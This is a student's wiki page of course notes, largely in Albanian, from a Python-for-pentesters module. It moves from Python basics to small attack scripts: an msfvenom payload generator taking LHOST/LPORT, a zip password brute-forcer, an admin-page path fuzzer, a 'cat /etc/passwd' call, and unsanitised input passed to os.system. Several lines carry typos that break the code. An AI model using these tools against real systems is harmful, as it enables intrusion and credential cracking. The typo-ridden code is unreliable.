dardan:cyberacademy:module-6-python_for_pentesters
https://www.w3schools.com
##########################################################################################
27.08.2018, Day 1
python
build by hackers
can not exist as hacker without python
cka eshte programimi
cka eshte inzhinjeringu
cka eshte gjuha programuse
disa shtresa
me shenja - low level communication
me fol - high level
low level = communikojm me machine level
high level = me mujt me komuniku me human (python, java, c sharp etj)
modulet = librari
cka eshte python, dallimi me C
python nuk e kompajllon kodin
eshte gjuhe interpretuse
gj. kompajlluse - marrrin kohe u executu, tani punon shpejt
gj. interpretuse - shpejt exekutohen, kadale ne long term
Day1
python
>>>
print "hello world"
variabla
>>> x = 1
>>> x = 12
>>> x = x + 1
string
" "
data types
string
integer
>>>x = "fsdfsdf"
>>>print type (x)
str
int - integjer, per numra
%r = cka do qe i jep e shitn ne thojza
%s
%d
True / False =
raw_input = kur lyp input prej userit
-------------------------------------------------
sfida 1
emrin
mbiemrin
moshen
gjinin
nacionalitetin
status
------------------------------------------------
sfida 2
emrin
mbiemi
ID
sa po don mi deponu
sa po don mi terheq
mosha
lokacioni
nenshtetsia
ne fund me parqit
shuma totale
sa jan terhek
sa jan mbet
##########################################################################################
29.08.2018, Day 2
variabla
var =
" " string
print "Name: {} Surname: {} Num {}".format(name, surname, num)
print "Name: %s Surname: %s Num: %d".format(name, surname, num)
print "Name: "+name+" Surname: "+surname+" Num: "+num+"
me marr inout ne useri
target = raw_input("IP: ")
num = input("Num: ") /print num
print type(target)
----------------------------------------------------------
nano argv.py
import sys
print "Script name %s" % sys.arvg[0] [0] emri i scriptes
print "Name %s" % sys.arvg[1] [1] emri
print "Surname %s" % sys.arvg[2] [2] surname
python argv.py
python argv.py argument1 argument2
-----------------------------------------------
libraia OS
per sys admin
per hacking
multi OS
os.system("ls")
os.system("ping -c 1 www.google.com")
------
import os
import sys
os.system("ping -c 1 {}".format(sys.argv[1])
python ping.py google.com
-------
import os
domain - raw_input("Domain: ")
os.system("ping -c1 {}".format(domain))
python ping_raw.py
Domain: google.com
------------------------------------------
tips and tricks
get help pa internet
if import os
help(os)
------------------------------------------
nano update.py
import os
os.system("sudo apt-get update -y")
python update.py
------------------------------------------
nano update.py
import os
"Startin update"
os.system("sudo apt-get update -y")
print "Update done"
os.system("ccat /etc/passwd")
print "System users ..."
os.system("htop")
python update.py
------------------------------------------
find my public IP
import urllib2
print(urllib2.urlopen('http://ip.42.pl/raw').read())
------------------------------------------
MSF payload
#!/usr/bin/python
import os
import sys
print "-"*100
print ("\t\t\tCreating a payload of your choice")
print "-"*100
sistemi = raw_input("\nType the os that you want to hack: ")
shell = raw_input("Type the payload form: ")
bind = raw_input("Type the communication form that u want to use: ")
ip = raw_input("Type you local ip: ")
port = raw_input("Type your port: ")
format = raw_input("Type format of the saving payload: ")
name = raw_input("Type the name of the paylaod: ")
print "-"*100
print "Now we will generate you payload, be patient....:)"
print "-"*100
os.system("msfvenom -p %s/%s/%s LHOST=%s LPORT=%s -f %s > %s.%s" %(sistemi, shell, bind, ip, port, format, name, format))
print "-"*100
print "Now its doneee"
print "-"*100
---------------------------------------------
import urllib2
import requester
request.get("http://ickosovo.com")
import netaddr
import socket
##########################################################################################
31.08.2018, Day 3
#BRUTFOCRING A ZIP PASSWORD FILE
nano BRUTEFORCE_A_ZIP_PASSWORD.py
import sys
import zipfile
zip_file = zipfile.ZipFile(sys.argv[1])
for i in open(sys.argv[2],"r"):
password = i.rstrip()
try:
zip_file.extractall(pwd=password)
print "Password is: {}".format(password)
break
except:
pass
python unzip.py file.zip pwd.txt
##########################################################################################
03.09.2018, Day 4
logical statements
import getpass
=
##########################################################################################
05.09.2018, Day 5
urllin2
requests
import urllib2
r = urllib2.urlopen("www.google.com")
print r.getcode() #status code
print r.read() #lexon
example
mkdir 1
mkdir 2
mkdir 3
mldir 4
nano index.html
test txt
------
nano web_b.py
import urllib2
import sys
for i in range(1,5):
r = urllib2.urlopen("{}/{}".format(sys.argv[1], i))
print r.getcode()
web fuzzer
ne gjet login page
>>>import requests
>>>r = requests.get("http://google.com")
>>>print r.status_code
200
>>>r = requests.get("http://127.0.0.1/dssd")
404
print type(r.status_code)
<type 'int'>
if r.status_code == 200:
print "faqja ekzistion"
else
print "Nuk existon"
>>> print r.status_code
--------------------
nano adminfinder.py
import sys
import requesters
for i in open(sys.argv[2], "r"):
i = i.rstrip()
r = requests.get("http://{}/{}".format(sys.argv[1],i))
if r.status_code == 200:
print "http://{}/{}".format(sys.argv[1],i, r.status_code)
python adminfinder.py 127.0.0.1 common.txt
---------------------
download nje admin login wordlist
cd/ var/vvv/html me wget url
rm -rf latest.zip
~/Desktop/working folder
python adminfinder.py 127.0.0.1 wordlist.txt
sudo apt-get install python-pip
sudo pip install requests
>>> import urllib2
>>> r = urllib2.urlopen("http://127.0.0.1/index.html")
>>> print r.read()
CA
>>> print r.read();
>>> if "CA" in r.read():
>>> if "CA" in data :
>>> print True
>>> r = urllib2.urlopen("http://127.0.0.1/index.html")
>>> if "CA" in r.read():
print True
True
--------------------------
import requests
r = requestes.get("http://ickosovo.com")
print r.text
--------------------------
import requests
r = requests.post("http://ickosovo.com/login.php",data={"user":"cyber"})
-------------------------
dardan/cyberacademy/module-6-python_for_pentesters.txt · Last modified: 2018/09/05 18:13 by dardan